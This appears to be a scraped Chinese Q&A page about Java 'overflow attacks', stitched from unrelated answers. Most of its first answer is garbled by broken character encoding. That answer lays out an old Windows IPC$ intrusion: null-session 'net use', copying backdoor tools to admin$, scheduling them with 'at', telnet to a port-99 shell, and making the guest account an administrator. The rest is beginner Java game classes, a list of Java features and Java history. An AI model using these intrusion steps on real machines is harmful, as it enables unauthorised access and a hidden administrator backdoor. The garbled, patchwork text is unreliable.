导航:首页 > 编程语言 > java数组溢出攻击

java数组溢出攻击

发布时间:2024-06-23 03:11:43

⑴ 璺姹俢md榛戝㈡敾鍑绘寚浠ゅ拰cmd鐢佃剳鍛戒护锛佹偓璧忓ぇ澶ф淮鏈

涓 鐩稿叧鍛戒护
寤虹珛绌鸿繛鎺:
net use \\IP\ipc$ "" /user:"" (涓瀹氳佹敞鎰:杩欎竴琛屽懡浠や腑鍖呭惈浜3涓绌烘牸)
寤虹珛闈炵┖杩炴帴:
net use \\IP\ipc$ "鐢ㄦ埛鍚" /user:"瀵嗙爜" (鍚屾牱鏈3涓绌烘牸)
鏄犲皠榛樿ゅ叡浜:
net use z: \\IP\c$ "瀵嗙爜" /user:"鐢ㄦ埛鍚" (鍗冲彲灏嗗规柟鐨刢鐩樻槧灏勪负鑷宸辩殑z鐩橈紝鍏朵粬鐩樼被鎺)
濡傛灉宸茬粡鍜岀洰鏍囧缓绔嬩簡ipc$锛屽垯鍙浠ョ洿鎺ョ敤IP+鐩樼+$璁块棶,鍏蜂綋鍛戒护 net use z: \\IP\c$
鍒犻櫎涓涓猧pc$杩炴帴
net use \\IP\ipc$ /del
鍒犻櫎鍏变韩鏄犲皠
net use c: /del 鍒犻櫎鏄犲皠鐨刢鐩橈紝鍏朵粬鐩樼被鎺
net use * /del 鍒犻櫎鍏ㄩ儴,浼氭湁鎻愮ず瑕佹眰鎸墆纭璁
鎻愮ず:瀵逛簬涓嶇啛鎮鍛戒护琛鎿嶄綔鐨勬湅鍙嬫潵璇.寤虹珛ipc$杩炴帴鍚,鍙浠ュ湪"鎴戠殑鐢佃剳"鎴"缃戜笂閭诲眳"鍙抽敭鏄犲皠缃戠粶椹卞姩鍣,鏁堟灉涓鏍.
浜 缁忓吀鍏ヤ镜妯″紡
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
杩欐槸鐢ㄣ婃祦鍏夈嬫壂鍒扮殑鐢ㄦ埛鍚嶆槸administrators锛屽瘑鐮佷负"绌"鐨IP鍦板潃(绌哄彛浠?鍝,杩愭皵濂藉埌瀹朵簡)锛屽傛灉鏄鎵撶畻鏀诲嚮鐨勮瘽锛屽氨鍙浠ョ敤杩欐牱鐨勫懡浠ゆ潵涓127.0.0.1寤虹珛涓涓杩炴帴锛屽洜涓哄瘑鐮佷负"绌"锛屾墍浠ョ涓涓寮曞彿澶勫氨涓嶇敤杈撳叆锛屽悗闈涓涓鍙屽紩鍙烽噷鐨勬槸鐢ㄦ埛鍚嶏紝杈撳叆administrators锛屽懡浠ゅ嵆鍙鎴愬姛瀹屾垚銆
2. C:\> srv.exe \\127.0.0.1\admin$
鍏堝嶅埗srv.exe涓婂幓锛屽湪娴佸厜鐨凾ools鐩褰曚笅灏辨湁锛堣繖閲岀殑$鏄鎸嘺dmin鐢ㄦ埛鐨刢:\winnt\system32\锛屽ぇ瀹惰繕鍙浠ヤ娇鐢╟$銆乨$锛屾剰鎬濇槸C鐩涓嶥鐩橈紝杩欑湅浣犺佸嶅埗鍒颁粈涔堝湴鏂瑰幓浜嗭級銆
3. C:\>net time \\127.0.0.1
鏌ユ煡鏃堕棿锛屽彂鐜127.0.0.1 鐨勫綋鍓嶆椂闂存槸 2002/3/19 涓婂崍 11:00锛屽懡浠ゆ垚鍔熷畬鎴愩
4. C:\>at \\127.0.0.1 11:05 srv.exe
鐢╝t鍛戒护鍚鍔╯rv.exe鍚э紙杩欓噷璁剧疆鐨勬椂闂磋佹瘮涓绘満鏃堕棿蹇锛屼笉鐒朵綘鎬庝箞鍚鍔ㄥ晩锛屽懙鍛碉紒锛
5. C:\>net time \\127.0.0.1
鍐嶆煡鏌ュ埌鏃堕棿娌℃湁锛熷傛灉127.0.0.1 鐨勫綋鍓嶆椂闂存槸 2002/3/19 涓婂崍 11:05锛岄偅灏卞噯澶囧紑濮嬩笅闈㈢殑鍛戒护銆
6. C:\>telnet 127.0.0.1 99
杩欓噷浼氱敤鍒癟elnet鍛戒护鍚э紝娉ㄦ剰绔鍙f槸99銆俆elnet榛樿ょ殑鏄23绔鍙o紝浣嗘槸鎴戜滑浣跨敤鐨勬槸SRV鍦ㄥ规柟璁$畻鏈轰腑涓烘垜浠寤虹珛涓涓99绔鍙g殑Shell銆
铏界劧鎴戜滑鍙浠Telnet涓婂幓浜嗭紝浣嗘槸SRV鏄涓娆℃х殑锛屼笅娆$櫥褰曡繕瑕佸啀婵娲伙紒鎵浠ユ垜浠鎵撶畻寤虹珛涓涓猅elnet鏈嶅姟锛佽繖灏辫佺敤鍒皀tlm浜
7.C:\> ntlm.exe \\127.0.0.1\admin$
鐢–opy鍛戒护鎶妌tlm.exe涓婁紶鍒颁富鏈轰笂锛坣tlm.exe涔熸槸鍦ㄣ婃祦鍏夈嬬殑Tools鐩褰曚腑锛夈
8. C:\WINNT\system32>ntlm
杈撳叆ntlm鍚鍔锛堣繖閲岀殑C:\WINNT\system32>鎸囩殑鏄瀵规柟璁$畻鏈猴紝杩愯宯tlm鍏跺疄鏄璁╄繖涓绋嬪簭鍦ㄥ规柟璁$畻鏈轰笂杩愯岋級銆傚綋鍑虹幇"DONE"鐨勬椂鍊欙紝灏辫存槑宸茬粡鍚鍔ㄦe父銆傜劧鍚庝娇鐢"net start telnet"鏉ュ紑鍚疶elnet鏈嶅姟锛
9.Telnet 127.0.0.1锛屾帴鐫杈撳叆鐢ㄦ埛鍚嶄笌瀵嗙爜灏辫繘鍏ュ规柟浜嗭紝鎿嶄綔灏卞儚鍦―OS涓婃搷浣滀竴鏍风畝鍗曪紒(鐒跺悗浣犳兂鍋氫粈涔?鎯冲仛浠涔堝氨鍋氫粈涔堝惂,鍝堝搱)
涓轰簡浠ラ槻涓囦竴,鎴戜滑鍐嶆妸guest婵娲诲姞鍒扮$悊缁
10. C:\>net user guest /active:yes
灏嗗规柟鐨凣uest鐢ㄦ埛婵娲
11. C:\>net user guest 1234
灏咷uest鐨勫瘑鐮佹敼涓1234,鎴栬呬綘瑕佽惧畾鐨勫瘑鐮
12. C:\>net localgroup administrators guest /add
灏咷uest鍙樹负Administrator^_^(濡傛灉绠$悊鍛樺瘑鐮佹洿鏀癸紝guest甯愬彿娌℃敼鍙樼殑璇濓紝涓嬫℃垜浠鍙浠ョ敤guest鍐嶆¤块棶杩欏彴璁$畻鏈).
ipc$缁忓吀鍏ヤ镜姝ラわ細
1銆乶et use \\ip\ipc$ 瀵嗙爜 /user:鐢ㄦ埛鍚
2銆乧opy 鏂囦欢鍚 \\ip\c$
3銆乶et time \\ip
4銆乤t \\ip 鏃堕棿 鍛戒护
5銆佸叆渚垫垚鍔燂紝杩炴帴浣犵殑鑲夐浮
甯哥敤鐨勭綉缁滃懡浠
net user 鏌ョ湅鐢ㄦ埛鍒楄〃
net user 鐢ㄦ埛鍚 瀵嗙爜 /add 娣诲姞鐢ㄦ埛
net user 鐢ㄦ埛鍚 瀵嗙爜 鏇存敼鐢ㄦ埛瀵嗙爜
net localgroup administrators 鐢ㄦ埛鍚 /add 娣诲姞鐢ㄦ埛鍒扮$悊缁
net user 鐢ㄦ埛鍚 /delete 鍒犻櫎鐢ㄦ埛
net user 鐢ㄦ埛鍚 鏌ョ湅鐢ㄦ埛鐨勫熀鏈鎯呭喌
net user 鐢ㄦ埛鍚 /active:no 绂佺敤璇ョ敤鎴
net user 鐢ㄦ埛鍚 /active:yes 鍚鐢ㄨョ敤鎴
net share 鏌ョ湅璁$畻鏈篒PC$鍏变韩璧勬簮
net share 鍏变韩鍚 鏌ョ湅璇ュ叡浜鐨勬儏鍐
net share 鍏变韩鍚=璺寰 璁剧疆鍏变韩銆備緥濡 net share c$=c:
net share 鍏变韩鍚 /delete 鍒犻櫎IPC$鍏变韩
net stop lanmanserver 鍏抽棴ipc$鍜岄粯璁ゅ叡浜渚濊禆鐨勬湇鍔
net use 鏌ョ湅IPC$杩炴帴鎯呭喌
net use \\ip\ipc$ "瀵嗙爜" /user:"鐢ㄦ埛鍚" ipc$杩炴帴
net use \\ip\ipc$ /del 鍒犻櫎涓涓杩炴帴
net use z: \\鐩鏍嘔P\c$ "瀵嗙爜" /user:"鐢ㄦ埛鍚" 灏嗗规柟鐨刢鐩樻槧灏勪负鑷宸辩殑z鐩
net use z: /del
net time \\ip 鏌ョ湅杩滅▼璁$畻鏈轰笂鐨勬椂闂
璺寰:\鏂囦欢鍚 \\ip\鍏变韩鍚嶅嶅埗鏂囦欢鍒板凡缁廼pc$杩炴帴鐨勮$畻鏈轰笂
net view ip 鏌ョ湅璁$畻鏈轰笂鐨勫叡浜璧勬簮
at 鏌ョ湅鑷宸辫$畻鏈轰笂鐨勮″垝浣滀笟
at \\ip 鏌ョ湅杩滅▼璁$畻鏈轰笂鐨勮″垝浣滀笟
at \\ip 鏃堕棿 鍛戒护(娉ㄦ剰鍔犵洏绗) 鍦ㄨ繙绋嬭$畻鏈轰笂鍔犱竴涓浣滀笟
at \\ip 璁″垝浣滀笟ID /delete 鍒犻櫎杩滅▼璁$畻鏈轰笂鐨勪竴涓璁″垝浣滀笟
at \\ip all /delete 鍒犻櫎杩滅▼璁$畻鏈轰笂鐨勫叏閮ㄨ″垝浣滀笟
at \\ip time "echo 5 > c:\t.txt" 鍦ㄨ繙绋嬭$畻鏈轰笂寤虹珛鏂囨湰鏂囦欢t.txt锛

涓嬮潰绾鎵嬫墦锛屼笂闈㈡槸搴﹀缁欑殑

taskkill /im 杩涚▼鍚 鍋滄㈣繍琛
tasklisy 鏌ョ湅杩愯岃繘绋
ipconfig 鏌ョ湅鏈鏈篒P
md 鍒涘缓鏂囦欢澶
rd 鍒犻櫎鏂囦欢澶
echo off > .txt|exit 娣诲姞鏂囨湰
echo 鍐呭 >> .txt 缁欐枃鏈娣诲姞鍐呭
澶嶅埗鏂囦欢
net user 鐢ㄦ埛鍚 瀵嗙爜/add 鍒涘缓涓涓鏅閫氳处鍙
net localgroup administrators 鐢ㄦ埛鍚 /add 鎶婅处鎴峰姞鍏ヨ秴绾х敤鎴风粍

java 创建一个LOL中的英雄类和怪物类 初学者,求大神指点

staticclassHero{//英雄类
privateStringname;//英雄的名字
privateIntegerexperience;//经验值
privateIntegerlevel;//英雄等级
privateIntegerattack;//攻击力

publicHero(Stringname){//新建英雄的构造方法
this.name=name;//输入名字
this.experience=0;//初始经验值为0
this.level=1;//初始等级为1
this.attack=100;//初始攻击力为100
}

publicvoidAttackMonster(Monstermonster){//攻击怪物的方法
System.out.println("英雄<"+this.name+">攻击<"+monster.getName()+">造成"+this.attack+"点伤害");
Integerhp=monster.getHealthPoint();//怪物被攻击前血量
if(hp>this.attack){//判断如果怪物的血量大于攻击力
hp=hp-this.attack;//怪物的血量就减少攻击力的点数
}else{//如果怪物的血量等于或者小于攻击力
hp=0;//怪物血量为0死亡
}
monster.setHealthPoint(hp);//改变怪物被攻击后的血量
System.out.println("怪物剩余血量"+hp);
if(hp==0&&this.level<18){//如果怪物死亡且英雄等级没有达到最高的18级
System.out.println("英雄<"+this.name+">的经验值增加"+monster.getExperience()+"点");
this.experience=this.experience+monster.getExperience();//英雄的经验值增加
if(this.experience>=level*100){//设定英雄升级所需经验值为等级*100如果英雄增加后的经验值达到升级条件
this.experience=this.experience-level*100;//经验值减去当前升级需要的经验值溢出的进入下一个等级经验
this.level=this.level+1;//英雄等级+1
this.attack=this.attack+20;//设定每升一级英雄攻击力+20
System.out.println("英雄<"+this.name+">升级了,等级+1,攻击力+20,当前等级"+this.level+",当前攻击力"+this.attack);
}
}
}

//获取英雄名字的方法
publicStringgetName(){
returnname;
}
//改变英雄名字的方法
publicvoidsetName(Stringname){
this.name=name;
}

//获取英雄当前经验值的方法
publicIntegergetExperience(){
returnexperience;
}
//改变英雄当前经验值的方法
publicvoidsetExperience(Integerexperience){
this.experience=experience;
}
//获取英雄当前等级的方法
publicIntegergetLevel(){
returnlevel;
}
//改变英雄当前等级的方法
publicvoidsetLevel(Integerlevel){
this.level=level;
}
//获取英雄当前攻击力的方法
publicIntegergetAttack(){
returnattack;
}
//改变英雄当前攻击力的方法
publicvoidsetAttack(Integerattack){
this.attack=attack;
}
}

staticclassMonster{//怪物类
privateStringname;//怪物的名字
privateIntegerhealthPoint;//生命值
privateIntegerlevel;//怪物等级
privateIntegerexperience;//怪物的经验值

publicMonster(Stringname,Integerlevel){//创建怪物的构造方法参数名字,等级
this.name=name;//初始化怪物的名字
this.level=level;//初始化怪物的等级
this.healthPoint=level*1000;//初始化怪物的血量
this.experience=level*10;//初始化怪物的经验,英雄杀死后可获得,设定怪物经验值为等级*10
}

publicIntegergetHealthPoint(){
returnhealthPoint;
}

publicvoidsetHealthPoint(IntegerhealthPoint){
this.healthPoint=healthPoint;
}

publicIntegergetLevel(){
returnlevel;
}

publicvoidsetLevel(Integerlevel){
this.level=level;
}

publicStringgetName(){
returnname;
}

publicvoidsetName(Stringname){
this.name=name;
}

publicIntegergetExperience(){
returnexperience;
}

publicvoidsetExperience(Integerexperience){
this.experience=experience;
}
}
publicstaticvoidmain(String[]args)throwsException{
Herohero=newHero("德玛西亚之力");//新建一个英雄
Monstermonster=newMonster("小兵",1);//新建一个小兵
do{
hero.AttackMonster(monster);//攻击怪物
}while(monster.getHealthPoint()!=0);//如果怪物没死一直攻击
}

⑶ java语言的特点有哪些

1)简单性
2)面向对象
3)分布式
4)健壮性
5)安全性
6)体系结构中立
7)可移植性
8)解释型
9)高性能
10)多线程
11)动态性
1.简单性:
Java语言是C++语言的一个“纯净”版本。没有头文件、指针运算、结构、联合、操作符重载、虚基类等。
2.面向对象
面向对象即面向数据。Java的面向对象特性与C++旗鼓相当,Java与C++的主要不同点在于多继承,在Java中,取而代之的是更简单的接口概念。
3.分布式
Java有一个丰富的例程库,用于处理像HTTP和FTP之类的TCP/IP协议。Java应用程序能够通过URL打开和访问网络上的对象,其便捷程度就像访问本地文件一样。
4.健壮性
Java编写的程序具有多方面的可靠性。Java编译器能够检测许多在其他语言中仅在运行时才能检测出来的问题。
5.安全性
Java适用于网络/分布式环境。从一开始,Java程序能够防范各种攻击,其中包括:
运行时堆栈溢出。
破坏自己进程空间之外的内存。
未经授权读写文件。
6.体系结构中立
编译器生成一个体系结构中立的目标文件格式,这是一种编译过的代码,只要有Java运行时系统,这些编译后的代码可以在许多处理器上运行。Java编译器通过生成与特定的计算机体系结构无关的字节码指令来实现这一特性。
7.可移植性
例:Java中的int永远为32位的整数,而C/C++中,int可能是16位整数、32位整数,也可能是编译器提供商指定的其他大小。这样的优点便消除了代码移植的问题。
8.解释型
Java解释器可以在任何一只了解释器的机器上执行Java字节码。
9.高性能
字节码可以(在运行时刻)动态地翻译成对应运行这个应用特定CPU的机器码。
10.多线程
多线程可以带来更好的交互响应和实时行为。如今大家非常关注并发性,我们不在追求更快的处理器,而是更多的处理器,Java是第一个支持并发的主流语言。
11.动态性
库中可以自由地添加新方法和实例变量,而对客户段没有任何影响。

⑷ JAVA中文是什么意思

JAVA中文意思是:计算机编程语言。

Java是一门面向对象编程语言,不仅吸收了++语言的各种优点,还摒弃了C++里难以理解的多继承、指针等概念,因此Java语言具有功能强大和简单易用两个特征。Java语言作为静态面向对象编程语言的代表,极好地实现了面向对象理论,允许程序员以优雅的思维方式进行复杂的编程。

任职于太阳微系统的詹姆斯·高斯林等人于1990年代初开发Java语言的雏形,最初被命名为Oak,目标设置在家用电器等小型系统的编程语言,应用在电视机、电话、闹钟、烤面包机等家用电器的控制和通信。

由于这些智能化家电的市场需求没有预期的高,Sun公司放弃了该项计划。随着1990年代互联网的发展,Sun公司看见Oak在互联网上应用的前景,于是改造了Oak,于1995年5月以Java的名称正式发布。Java伴随着互联网的迅猛发展而发展,逐渐成为重要的网络编程语言。

(4)java数组溢出攻击扩展阅读:

JAVA和互联网的渊源:

1994年6月,在同约翰·盖吉、詹姆斯·高斯林、比尔·乔伊、帕特里克·诺顿、韦恩·罗斯因和埃里克·施密特经历了一场历时三天的头脑风暴后,团队决定再一次改变努力的目标,这次他们决定将该技术应用于万维网。

他们认为随着Mosaic浏览器的到来,因特网正在向同样的高度互动的远景演变,而这一远景正是他们在有线电视网中看到的。作为原型,帕特里克·诺顿写了一个小型万维网浏览器,WebRunner,后来改名为HotJava[12]。

1994年10月,HotJava和Java平台为公司高层进行演示。1994年,Java 1.0a版本已经可以提供下载,但是Java和HotJava浏览器的第一次公开发布却是在1995年3月23日SunWorld大会上进行的。升阳公司的科学指导约翰·盖吉宣告Java技术。

这个发布是与网景公司的执行副总裁马克·安德森的惊人发布一起进行的,宣布网景将在其浏览器中包含对Java的支持。1996年1月,Sun公司成立了Java业务集团,专门开发Java技术。

⑸ java中可以实现缓冲区溢出攻击吗

你写个java程序把系统盘所有文件删除了应该算是“对本地计算机文件进行破坏性的操作”吧,这个还是可以做到的……

关于缓冲区溢出问题,如果是指jvm的缓冲区溢出,那不知道有没有办法,但即使有似乎也没什么用;
如果是指像以前windows远程调用接口这类的缓冲区溢出漏洞的话,当然可以,什么语言都可以。

阅读全文

与java数组溢出攻击相关的资料

热点内容
js调用外部js 浏览:273
苹果手机照片后期软件 浏览:333
linux自动备份oracle数据库 浏览:447
ios重启app的代码 浏览:565
装了win10文件加锁打不开 浏览:713
苹果电脑怎么新建一个pdf的文件 浏览:379
wps显示word不是一个有效文件 浏览:48
凯立德地图升级工具 浏览:474
linux系统参看log 浏览:416
用手机设置无线密码是多少 浏览:829
销售季度绩效考核怎么体现数据 浏览:335
c盘的文件删除不了 浏览:589
智力app哪个最好用 浏览:203
分析程序的目的 浏览:346
数据线插头用多少度锡丝 浏览:666
怎么用app查看社保卡余额 浏览:374
苹果手机无线网络信号不好 浏览:383
ue4材质中文教程 浏览:689
打开附带文件在图层 浏览:567
mfc怎么删除数据库 浏览:468

友情链接